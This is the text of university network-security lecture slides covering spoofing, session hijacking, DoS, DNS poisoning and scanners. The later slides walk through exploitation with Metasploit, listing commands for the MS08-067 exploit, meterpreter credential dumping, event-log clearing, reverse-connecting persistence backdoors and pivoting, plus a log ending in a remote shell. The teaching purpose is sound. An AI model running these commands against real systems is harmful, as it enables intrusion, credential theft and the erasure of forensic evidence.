Network Security CPSC6128 – Lecture 3 Attacks, Vulnerabilities and Exploits CPSC 6128 - Network Security 1 Network Attack Methodology Recon – Information gathering Scanning – Enumeration Vulnerability Identification •Post Exploitation Maintaining Access Removing Forensic Evidence Exfiltration Exploit Gaining access Elevating given access Application/Web level attacks Denial of Service (DOS) CPSC 6128 - Network Security 2 GENERAL NETWORK ATTACK TECHNIQUES CPSC 6128 - Network Security 3 IP address spoofing (1) SA: 36.220.9.59 DA: 212.68.212.7 212.68.212.7 145.13.145.67 Attacker doesn’t want actions traced back Simply re-configure IP address in Windows or Unix. Or enter spoofed address in an application e.g., decoy packets with Nmap CPSC 6128 - Network Security 4 IP address spoofing (2) 145.13.145.67 attacker SA: 36.220.9.59 DA: 212.68.212.7 212.68.212.7 victim 36.220.9.59 SA: 212.68.212.7 DA: 36.220.9.59 But attacker cannot interact with victim Unless attacker is on path between victim and spoofed address CPSC 6128 - Network Security 5 IP spoofing with TCP? Can an attacker make a TCP connection to server with a spoofed IP address? Not easy Sequence Numbers are negotiated between sender and receiver to insure that packets are part of an established connection If attacker can guess initial sequence number, can attempt to inject into the conversation But TCP uses random initial sequence numbers Poor implementations of TCP, however can allow for the sequence #’s to be predictable CPSC 6128 - Network Security 6 Defense: Egress/Ingress filtering Egress Filtering 127.32.1.1 x Internet 222.22/16 Ingress Filtering 127.32.1.1 x Internet 222.22/16 CPSC 6128 - Network Security 7 Ingress Filtering: Upstream ISP (1) 12.12/24 regional ISP BGP update: 12.12/24, 34.34/24 34.34/24 tier-1 ISP 56.56/24 BGP update: 56.56/24, 78.78/24 regional ISP 78.78/24 CPSC 6128 - Network Security 8 Ingress Filtering: Upstream ISP (2) 12.12/24 BGP update: 12.12/24, 34.34/24 Filter all traffic but 12.12/24 and 34.34/24 34.34/24 56.56/24 BGP update: 56.56/24, 78.78/24 Filter all traffic but 56.56/24 and 78.78/24 78.78/24 CPSC 6128 - Network Security 9 Ingress Filtering: Upstream ISP (3) 12.12/24 regional ISP 56.56.1.1 x Filter all but 12.12/24 and 34.34/24 34.34/24 tier-1 ISP Filter all but 56.56/24 and 78.78/24 56.56/24 regional ISP 78.78/24 CPSC 6128 - Network Security 10 Ingress Filtering: Upstream ISP (4) 12.12/24 34.34.1.1 Filter all but 12.12/24 and 34.34/24 regional ISP 34.34/24 spoofed packet gets through! tier-1 ISP Filter all but 56.56/24 and 78.78/24 56.56/24 regional ISP 78.78/24 CPSC 6128 - Network Security 11 Ingress/Egress filtering: Summary Effectiveness depends on widespread deployment at access ISPs Deployment in upstream ISPs helps, but does not eliminate IP spoofing Even if universally deployed at access, hacker can still spoof another address in its access network 12.12/24 See RFC 2827 “Network Ingress Filtering: Defeating DDoS” 12 CPSC 6128 - Network Security Attack TCP Session Hijacking A technique used to gain access to Internet servers It was first used by Kevin Mitnick to gain access to Tsutomu Shimomura's workstation in 1995 Take control of one side of a TCP connection Marriage of sniffing and spoofing Alice telnet Bob Alice Attacker CPSC 6128 - Network Security 13 TCP Session Hijacking: Limitation 2. to resync, Alice sends segment with correct seq # Alice Bob is getting segments from attacker and Alice. Source IP address same, but seq #’s different. Bob likely drops connection. 1. weird ACK # for data never sent Bob Attacker Attacker’s solutions: 1) Overwrite IP-to-MAC ARP tables, then Alice’s segments will not reach Bob and vice-versa 2) DOS attack Alice so her machine won’t see erroneous replies from Bob 3) Older method was to use IP source routing to route packets back to attacker CPSC 6128 - Network Security 14 Session hijacking: The details Attacker and Alice are on the same network segment where traffic passes from Alice to Bob, as well as to the attacker Attacker can sniff the packets And See TCP packets between Bob and Alice and their sequence numbers Attacker jumps in, sending TCP packets to Bob source IP address = Alice’s IP address Bob now obeys commands sent by attacker, thinking they were sent by Alice Principal defense Encryption with authentication protocol Attacker does not have keys to decrypt and insert meaningful traffic How about Attacker and Alice are not on the same network Segment? Very complex, please read the handout –TCP Session Hijacking Tools used Juggernaut (Linux) Hunt (Unix based) T-Sight (Windows OS) CPSC 6128 - Network Security 15 HTTP Session Hijacking: HTTP Session ID: ADEF78DDC543DDDE Client Web Server Attacker Involves obtaining the HTTP Session ID The ID can be found in cookies and URLs Called Sidejacking if sniffed CPSC 6128 - Network Security 16 Firesheep – HTTP Sidejacking ---Not downloaded, but handout. CPSC 6128 - Network Security 17 Denial-of-Service Attacks Prevent access by legitimate users or stop critical system processes Vulnerability attack Send a few crafted messages to target app that has vulnerability Malicious messages called the “exploit” Remotely stopping or crashing services Connection flooding Overwhelming connection queue with SYN flood Bandwidth flooding attack Overwhelming communications link with packets Strength in flooding attack lies in volume rather than content CPSC 6128 - Network Security 18 DoS and DDoS DoS: source of attack small # of nodes source IP typically spoofed DDoS From thousands of nodes IP addresses often not spoofed Often implemented as a Botnet CPSC 6128 - Network Security 19 Interlude: IP datagram format 32 bits header length (bytes) “type” of data max number remaining hops (decremented at each router) upper layer protocol to deliver payload to ver head. type of len service 16-bit identifier upper time to layer live length fragment flgs offset Internet checksum total datagram length (bytes) for fragmentation/ reassembly 32 bit source IP address 32 bit destination IP address Options (if any) data (variable length, typically a TCP or UDP segment) CPSC 6128 - Network Security 20 IP Fragmentation and Reassembly Example 4000 byte datagram MTU = 1500 bytes length ID fragflag offset =4000 =x =0 =0 One large datagram becomes several smaller datagrams length ID fragflag offset =1500 =x =1 =0 1480 bytes in data field length ID fragflag offset =1500 =x =1 =185 offset = 1480/8 length ID fragflag offset =1040 =x =0 =370 CPSC 6128 - Network Security 21 DoS: examples of vulnerability attacks Land: sends spoofed packet with source and dest address/port the same Ping of death: Teardrop, Newtear, Bonk, Syndrop: tools send overlapping segments, that is, fragment offsets incorrect. sends oversized ping packet Jolt2: sends a stream of fragments, none of which have fragflag set to 0. Rebuilding consumes all processor capacity. Patches fix the problem, but malformed packet attacks continue to be discovered. CPSC 6128 - Network Security 22 Connection flooding: Overwhelming connection queue w/ SYN flood Send SYN packet Attack Recall client sends SYN packet with initial seq. number when initiating a connection. Allocate Memory TCP on server machine allocates memory on its connection queue, to track the status of the new half-open connection. Send many SYN packets Fill up connection queue with half-open connections Can spoof source IP address When connection queue is exhausted no new connections can be initiated by legit users. Wait for ACK For each half-open connection, server waits for ACK segment, using a timeout that is often > 1 minute CPSC 6128 - Network Security 23 DoS: Overwhelming connection queue with SYN flood Amateur attack: attacker Connection queue freed up with RST segment victim Alice Expert attack: Use multiple source IP Addresses Each from unresponsive addresses CPSC 6128 - Network Security 24 SYN flood defense: SYN cookies (1) SYN with ISNA Client SYN-ACK with ISNB= cookie Web Server When SYN segment arrives, server calculates function (hash) based on: Source and destination IP addresses and port numbers, MSS (Max Segment Size) and a slowly incrementing timestamp Hash Output 32 bits Server uses resulting “cookie” for its initial seq # (ISN) in SYNACK Server does not allocate anything to half-open connection: Does not remember client’s ISN Does not remember cookie CPSC 6128 - Network Security 25 SYN flood defense: SYN cookies (2) If SYN is legitimate Client returns final ACK w/ Seq# = ISN(of server)+1 Server computes same function, verifies function = SEQ # in ACK segment If SYN-flood attack with spoofed IP address No ACK comes back to server for connection. No problem server is not waiting for an ACK and has no resources allocated Legit connection established without the need for halfopen connections CPSC 6128 - Network Security 26 Another Attack: Overwhelming link bandwidth with packets Attack traffic can be made similar to legitimate traffic, hindering detection. Flow of traffic must consume target’s bandwidth resources Attacker needs to engage more than one machine => DDoS May be easier to get target to fill-up its upstream bandwidth: async access CPSC 6128 - Network Security 27 Example: Distributed DoS Attacker takes over many machines, called “bots”. Potential bots are machines with vulnerabilities. bot bot attacker Internet victim bot bot processes wait for command from attacker to flood a target bot CPSC 6128 - Network Security 28 Example: LOIC (try it) CPSC 6128 - Network Security 29 DDoS using DNS Server ----Amplification Attack DNS server reply request request reply DNS server request attacker reply victim DNS server request reply Source IP = Victim’s IP DNS server CPSC 6128 - Network Security 30 DDoS: Amplification Attack Spoof source IP address = victim’s IP Goal: generate lengthy or numerous replies for short requests: Amplification Amplification Attack can also be done with Web and other services CPSC 6128 - Network Security 31 DDoS Defenses Don’t let your systems become bots Keep systems patched up Employ egress anti-spoof filtering on external router Filter dangerous packets Signature and anomaly detection and filtering Rate limiting Limit # of packets sent from source to dest To avoid vulnerability attacks Using Intrusion prevention systems Over-provisioning of resources Abundant bandwidth Large pool of servers ISP needs abundant bandwidth too Multiple ISPs CPSC 6128 - Network Security 32 DNS attacks Reflector attack Leverage DNS for attacks on arbitrary targets - DDOS Denying DNS service Stop DNS root servers Stop top-level-domain servers (e.g. .com domain) Stop local (default name servers) Use fake DNS replies to redirect user Poisoning DNS Insert false resource records into various DNS caches False records contain IP addresses operated by attackers 33 CPSC 6128 - Network Security DDOS DNS Attack Against Root Servers Example Oct 21, 2002 Ping packets sent from bots to the 13 DNS root servers Goal: bandwidth flood servers Minimize impact: DNS caching Rate limiting at upstream routers: filter ping when they arrive at an excessive rate Root server attack is easy to defend Download root server database to local (default) name servers Not much data in root server; changes infrequently Similar kind of attack attempted in March 2012 34 CPSC 6128 - Network Security DNS attack: redirecting hub or WiFi 1 network client local DNS server 2 attacker 1. 2. Issues: Must spoof IP address Set to local DNS server (easy) Client sends DNS query to its local DNS server; sniffed by attacker Must match reply ID with request ID Attacker responds with bogus Easy DNS reply May need to stop reply from the local DNS server harder CPSC 6128 - Network Security 35 Poisoning DNS Cache Poisoning Attempt to put bogus records into DNS name server caches Bogus records could point to attacker nodes Attacker nodes could phish But unsolicited replies are not accepted at a name server Name servers use IDs in DNS messages to match replies to queries So can’t just insert a record into a name server by sending a DNS reply message. But can send a reply to a request. CPSC 6128 - Network Security 36 Poisoning local DNS server authoritative DNS for csu.edu Client Connecting Remotely to CSU 2. iterative DNS queries 1. DNS query www.csu.edu= ? 3. DNS reply www.csu.edu= 17.32.8.9 Attacker 17.32.8.9 csu = ColumbusState Local ISP DNS Server for Client Goal: Put bogus IP address for poly.edu in local Berkeley DNS server 1) Attacker queries local DNS server 2) Local DNS makes iterative queries 3) Attacker waits for some time; sends a bogus reply, spoofing authoritative server for csu.edu. CPSC 6128 - Network Security 37 Poisoning local DNS server (cont) Client Connecting Remotely to CSU authoritative DNS for csu.edu 1. DNS query www.csu.edu=? 2. DNS response www.csu.edu=17.32.8.9 3. http connection to 17.32.8.9 Attacker 17.32.8.9 Local ISP DNS Server for Client DNS response can provide IP address of malicious server! CPSC 6128 - Network Security 38 DNS Poisoning (cont) Issues: Attacker needs to know sequence number in request message sent to upstream server Not easy! Attacker may need to stop upstream name server from responding So that server under attack doesn’t get suspicious Ping of death, DoS, overflows, etc CPSC 6128 - Network Security 39 DNS attacks: Summary DNS a critical component of the Internet infrastructure But is surprisingly robust DDoS attacks against root servers have been largely unsuccessful Poisoning and redirecting attacks are difficult unless you can sniff DNS requests And even so, may need to stop DNS servers from replying DNS can be leveraged for reflection attacks against non-DNS nodes CPSC 6128 - Network Security 40 TOOLS AND ATTACK IMPLEMENTATION CPSC 6128 - Network Security 41 Vulnerability Scanners Vulnerability a software bug or mis-configuration allowing for unauthorized access Original vulnerability scanner It was called SATAN (Security Admin Tool for Analyzing Networks) Written by Dan Farmer in 1995 employed by SGI at the time Very controversial when released It eventually resulted in SGI firing Dan Farmer Commercial scanners (currently) ISS Internet Scanner SAINT Retina by eEye Nessus by Tenable CPSC 6128 - Network Security 42 Nessus Nessus project started by Renaud Deraison in 1998 Very popular vulnerability scanner Oct 2005 founded Tenable security and changed to “closed source” Still free but with limited signature set OPEN-VAS is a fork of the original Nessus code and is still open source at http://www.openvas.org CPSC 6128 - Network Security 43 Nessus Architecture CPSC 6128 - Network Security 44 Nessus Plugin Selection CPSC 6128 - Network Security 45 Nessus Scan Results CPSC 6128 - Network Security 46 Web Vulnerability Scanners Nikto Most popular Looks for default files and configs and well as server misconfiguration Provides versioning information Runs on Linux or Windows http://www.cirt.net CPSC 6128 - Network Security 47 Nikto CPSC 6128 - Network Security 48 Exploits Bought and Sold CPSC 6128 - Network Security Exploitation Tools Immunity Canvas Commercial http://www.immunitysec.com Core Impact Commercial http://www.coresecurity.com Metasploit Open Source: http://www.metasploit.org recently acquired by Rapid7 CPSC 6128 - Network Security 50 Immunity Canvas Runs on Windows, OS X or Linux (Linux recommended) Currently over 370 exploits with an average of 4 exploits added each month Flexible payload options Connect to sock or “call back” MOSDEF session allows for arbitrary code execution Can get screenshots, video, keylogging, etc. CPSC 6128 - Network Security 51 Canvas Interface CPSC 6128 - Network Security 52 Canvas Interface Red – Modules – Things that Canvas can do Purple – Things that Canvas know about Yellow – Status Window, what Canvas is currently doing CPSC 6128 - Network Security 53 Canvas Set Target CPSC 6128 - Network Security 54 Canvas – Port Scan Canvas has reconnaissance tools and vulnerability assessment tools built in These can be supplemented by imports from other tools such as Nessus Here we can see that the scan reveals the usual Windows ports open CPSC 6128 - Network Security 55 Canvas – Exploits Lets try a SMB exploit CPSC 6128 - Network Security 56 Canvas – Launch Exploit CPSC 6128 - Network Security 57 Canvas – Success We Have Shell! CPSC 6128 - Network Security 58 The Metasploit Framework Open Source Development Framework for Penetration testing Patch verification Regression testing Security Research Runs on Linux, Mac OS X, BSD, Windows Remote and local exploits Browser exploits Ability to create exploits Developed by HD Moore Recently “acquired” by Rapid7 All indications are that it will remain open source CPSC 6128 - Network Security 59 Terms Vulnerability weakness in a system which allows an attacker to reduce the systems security posture Exploit Code which allows an attacker to take advantage of the vulnerability in the system Payload The code which is delivered by the exploit This is the code which actually runs on the victim system Post exploitation Encoders Way to obfuscate the payload code so that anti-virus and IDS won’t detect Module A small piece of code to that can be added to the Metasploit Framework to execute an attack Auxiliary Module other parts of Metasploit that aid in exploitation such as scanners CPSC 6128 - Network Security Why Metasploit Framework? Individual exploit code hard to manage, update and customize No code reuse With a framework there is no need to customize exploits to match payload code Mix and match exploits and payloads easily Rapid development of new exploit code CPSC 6128 - Network Security Architecture Overview Diagram by HDMoore/MSF Libraries Custom Plugins Protocol Tools REX Framework:Core Framework:Base Interfaces msfweb msfcli msfconsole msfgui msfapi Modules Interfaces Security Tools WebInterfaces Services Interfaces Integration CPSC 6128 - Network Security exploits payloads encoders nops auxiliary 62 Different types of Payload Inline A single payload containing the exploit and full shellcode for the selected task Inline payloads are by design more stable than their counterparts because they contain everything all in one However, some exploits won’t support the resulting size of these payloads Staged Many exploitable situations constrain how many bytes an attacker may load into one contiguous location in memory One way to do interesting post exploitation in these situations is to deliver the payload in stages Reverse Instead of the attacker connecting to the payload on the exploited host The payload on the exploited host connects back to the attacker Good for inside firewalls. NoNx The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP) The Metasploit NoNX payloads are designed to circumvent DEP PassiveX A payload that can help in circumventing restrictive outbound firewalls It does this by using an ActiveX control to create a hidden instance of Internet Explorer Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses CPSC 6128 - Network Security More About Payloads (cont) IPv6 IPv6 payload designed to work over IPv6 Meterpreter Short for Meta-Interpreter an advanced, multi-faceted payload that operates via DLL injection resides completely in the memory of the remote host leaves no traces on the hard drive making it very difficult to detect with conventional forensic techniques CPSC 6128 - Network Security Meterpreter Meta-Interpreter Advanced payload which operates via DLL injection Resides completely in memory No hard disk writes at all Scripts and plugins supported Well supported and constant development Encrypted communications between the attacker and payload Remote command execution In-memory process migration Registry modifications Pivoting File system support and more CPSC 6128 - Network Security How it Works Exploit + 1st Stage Payload Payload Connects back to MSF 2nd Stage DLL Injection Payload Sent MSF Sends Meterpreter Server DLL Client and Server Communicate CPSC 6128 - Network Security 66 Metasploit Interfaces MSFGUI MSFd MSFWeb MSFConsole CPSC 6128 - Network Security MSFCLI Armitage MsfConsole CPSC 6128 - Network Security 68 MsfConsole Basics Interactive console for Metasploit Tab completion (double tap) to help type Can execute external commands Most flexible interface CPSC 6128 - Network Security 69 Directory Structure Modules What we will mainly be working with Contain Exploits, auxiliary, encoders Scripts extension scripts Typically from 3rd parties. “run checkvm”, “run getcountermeasure”, “run getgui” (Meterpreter scripts) Plugins location for your own exploits development External interfaces to external services such a serial port Data data source for exploits dictionaries, wordlists, sql, snmp mibs, etc. CPSC 6128 - Network Security 70 Modules Auxiliary tasks outside of direct exploitation such as port scanning, sniffing, etc Encoders various techniques for obfuscating payloads to avoid antivirus and IDS Exploits organized by OS Ruby scripts containing the exploit code Nops nop sleds for various CPU architecture Post post exploitation scripts for data gather, exfiltration Payloads 3 types (singles, stagers, stages) OS specific CPSC 6128 - Network Security 71 Exploitation Basics-search exploits Identify vulnerability based on recon and possible output from vulnerability scanner (Nessus) Choose exploit which can take advantage of that vulnerability Use “search” example using MS08-067 Play techno music in background CPSC 6128 - Network Security Exploitation Basics—use exploits “use” command followed by directory path “use exploit/windows/smb/ms08_067_netapi” Use tab completion double tap Display options required for exploit “show options” CPSC 6128 - Network Security Exploitation Basics—Set PAYLoad Select PAYLOAD to deliver after successful exploitation Can use tab completion to show options “set PAYLOAD windows/meterpreter/bind_tcp” bind_tcp will listen for attacker to connect Reverse payload will connect back to the attacker CPSC 6128 - Network Security Exploitation Basics—Set RHOST “show options” now shows PAYLOAD options “set” command will set the options “set RHOST 172.16.156.132 CPSC 6128 - Network Security Exploitation Basics –Finally, exploit “exploit” to run exploit Will open a session to target with prompt “meterpreter>” “background” will send session to the background “session –i 1” will return to the first session “execute –f cmd.exe –i –H” will have remote shell CPSC 6128 - Network Security Now What? - Post Exploitation Meterpreter Basics Migrate migrates the meterpreter DLL injection to a different process Explorer.exe is a good choice Sysinfo displays information about the target system Download “download c:\\boot.ini” - downloads from the target machine Note double slashes Upload “upload c:\\boot.ini c:\\windows\system32”, or “upload c:\\boot.ini yang” uploads file to the target machine Getuid returns the userid (permissions) that meterpreter is running Execute “execute –f cmd.exe –i –H” runs command on the remote machine “–i” runs the command interactively “-H’ hides the process from user hashdump dumps the SAM database for offline cracking Clearev clears the windows events logs MUCH MORE See: http://www.offensive-security.com/metasploit-unleashed/ CPSC 6128 - Network Security Pivoting Using one compromised machine to further exploit other hosts or networks Example would be a client side “drive by browser” attack Once the attacker owns this machine inside the firewall they can launch all further attacks from this compromised machine Attacker Compromised Machine CPSC 6128 - Network Security Target Machine Add Route to an exist session Add route from attacker machine to remote network “route add 10.100.100.0 255.255.255.0 1” adds a route to the remote network through meterpreter session 1 Further attacks to 10.100.100.0 will traverse this session and the already exploited host CPSC 6128 - Network Security Persistence If remote target reboots meterpreter session is lost Might be ok if exploit is reliable Just run again However, this is usually not the case Two ways to perform persistence with Meterpreter • • Persistence script Metsvc • • Set up a backdoor at the remote machine use “run metsvc –A” Remove backdoor use “run metsvc –r” CPSC 6128 - Network Security Persistence Script Creates persistent backdoor which can be configured to connect back to attacker on system boot Creates a vbs file and registry key Can be uninstalled remotely “run persistence –A –L c:\\windows\system32 –X –i 10 –p 443 –r 192.168.1.10” CPSC 6128 - Network Security Metsvc backdoor Backdoor runs as a service on the target Attacker can connect to it remotely Less noisy compared to persistence script CPSC 6128 - Network Security “3rd Party” Rootkits Used for more advanced post exploitation Hiding process, files, data exfil. http://www.rootkit.com HackerDefender written by Holy Father Kernel mode rootkit Holy Father offered custom builds of HD to bypass AV/IDS Well understood – so we may use this in lab CPSC 6128 - Network Security Client Side Exploits Network side exploits are becoming more and more rare Attackers have moved to “client side” exploits Client-side exploits leverage software/applications running on the target system Browser based attacks are common Java also significant attack vector CPSC 6128 - Network Security Example Client Side Exploit CPSC 6128 - Network Security 85 Example Client Side Exploit msf> exploit(apple_itunes_playlist) > exploit [*] Started reverse handler [*] Using URL: http://10.10.11.10:8080/mycoolplaylist.pls [*] Server started. [*] Exploit running as background job. msf> exploit(apple_itunes_playlist) > [*] Sending stage (474 bytes) [*] Command shell session 1 opened (10.10.21.10:65535 -> 192.168.113.10:1075) msf> exploit(apple_itunes_playlist) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\System32\> CPSC 6128 - Network Security 86 Armitage CPSC 6128 - Network Security 87 Type “armitage” from Backtrack Defaults ok Will start Metasploit and auto connect. Click YES when prompted to start Metasploit CPSC 6128 - Network Security 88 Scanning Nmap built in MSF scans are Metasploit built in scanning modules. Generally Nmap is better All found targets are automatically added to the target window CPSC 6128 - Network Security 89 Exploitation Apply “Find Attack” either by Port or by Vulnerability first Right click target will bring up possible exploits Can also specify exploits and modules from the right hand menu CPSC 6128 - Network Security 90 Exploitation When host is compromised it appears RED with Lighting Select “Interact”, then Command Shell access CPSC 6128 - Network Security 91 Next Time Covering your tracks…. CPSC 6128 - Network Security 92